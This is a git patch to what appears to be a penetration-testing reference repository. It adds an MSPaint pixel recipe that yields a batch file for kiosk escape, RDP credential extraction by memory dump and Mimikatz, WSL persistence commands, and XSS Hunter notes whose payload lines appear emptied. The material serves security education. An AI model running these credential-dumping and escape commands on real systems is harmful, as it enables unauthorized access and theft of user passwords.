From 14cc88371d2bc4bedb2e08b786b45213c7fd064c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 11 Feb 2023 17:49:55 +0100
Subject: [PATCH] WSL + RDP Passwords + MSPaint Escape
---
.../Active Directory Attack.md | 2 ++
Methodology and Resources/Escape Breakout.md | 21 +++++++-----
.../Windows - Mimikatz.md | 34 +++++++++++++++++--
.../Windows - Persistence.md | 17 ++++++++++
XSS Injection/README.md | 13 ++++---
5 files changed, 72 insertions(+), 15 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index c31018f..c3f20ee 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -4186,3 +4186,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)
* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
+* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
+* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
\ No newline at end of file
diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md
index b66a737..8fb8528 100644
--- a/Methodology and Resources/Escape Breakout.md
+++ b/Methodology and Resources/Escape Breakout.md
@@ -26,18 +26,20 @@
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
* **Task Manager**: `File` > `New Task (Run...)` > `cmd`
* **MSPAINT.exe**
- * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
+ * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels
* Zoom in to make the following tasks easier
* Using the colour picker, set pixels values to (from left to right):
- * 1st: R: 10, G: 0, B: 0
- * 2nd: R: 13, G: 10, B: 13
- * 3rd: R: 100, G: 109, B: 99
- * 4th: R: 120, G: 101, B: 46
- * 5th: R: 0, G: 0, B: 101
- * 6th: R: 0, G: 0, B: 0
+ ```ps1
+ 1st: R: 10, G: 0, B: 0
+ 2nd: R: 13, G: 10, B: 13
+ 3rd: R: 100, G: 109, B: 99
+ 4th: R: 120, G: 101, B: 46
+ 5th: R: 0, G: 0, B: 101
+ 6th: R: 0, G: 0, B: 0
+ ```
* Save it as 24-bit Bitmap (*.bmp;*.dib)
* Change its extension from bmp to bat and run
-
+
## Sticky Keys
@@ -146,4 +148,5 @@ firefox irc://127.0.0.1 -P "Test"
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
-* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
\ No newline at end of file
+* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
+* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
index 403a2d2..20b614c 100644
--- a/Methodology and Resources/Windows - Mimikatz.md
+++ b/Methodology and Resources/Windows - Mimikatz.md
@@ -9,7 +9,8 @@
* [Pass The Hash](#pass-the-hash)
* [Golden ticket](#golden-ticket)
* [Skeleton key](#skeleton-key)
-* [RDP session takeover](#rdp-session-takeover)
+* [RDP Session Takeover](#rdp-session-takeover)
+* [RDP Passwords](#rdp-passwords)
* [Credential Manager & DPAPI](#credential-manager--dpapi)
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
@@ -168,7 +169,7 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```
-## RDP session takeover
+## RDP Session Takeover
Use `ts::multirdp` to patch the RDP service to allow more than two users.
@@ -195,6 +196,34 @@ create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
```
+## RDP Passwords
+
+Verify if the service is running:
+
+```ps1
+sc queryex termservice
+tasklist /M:rdpcorets.dll
+netstat -nob | Select-String TermService -Context 1
+```
+
+* Extract passwords manually
+ ```ps1
+ procdump64.exe -ma 988 -accepteula C:\svchost.dmp
+ strings -el svchost* | grep Password123 -C3
+ ```
+* Extract passwords using Mimikatz
+ ```ps1
+ privilege::debug
+ ts::logonpasswords
+ ```
+
+
+
+
+
+
+
+
## Credential Manager & DPAPI
@@ -286,3 +315,4 @@ More information can be grabbed from the Memory with :
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
+- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index a71b893..579c2de 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -33,6 +33,7 @@
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
* [Virtual Machines](#virtual-machines)
+ * [Windows Subsystem for Linux](#windows-subsystem-for-linux)
* [Domain](#domain)
* [Golden Certificate](#golden-certificate)
* [Golden Ticket](#golden-ticket)
@@ -539,6 +540,22 @@ sudo mkdir /mnt/c
sudo mount -t vboxsf shadow_c /mnt/c
```
+### Windows Subsystem for Linux
+
+```ps1
+# List and install online packages
+wsl --list --online
+wsl --install -d kali-linux
+
+# Use a local package
+wsl --set-default-version 2
+curl.exe --insecure -L -o debian.appx https://aka.ms/wsl-debian-gnulinux
+Add-AppxPackage .\debian.appx
+
+# Run the machine as root
+wsl kali-linux --user root
+```
+
## Domain
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 2f5ea7a..59087ac 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -510,13 +510,18 @@ document.getElementById('btn').onclick = function(e){
### XSS Hunter
-XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
-
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
+XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app).
+
+You can set up an alternative version
+* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
+* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
+
```xml
-">
-
+">
+">
+
```
### Other Blind XSS tools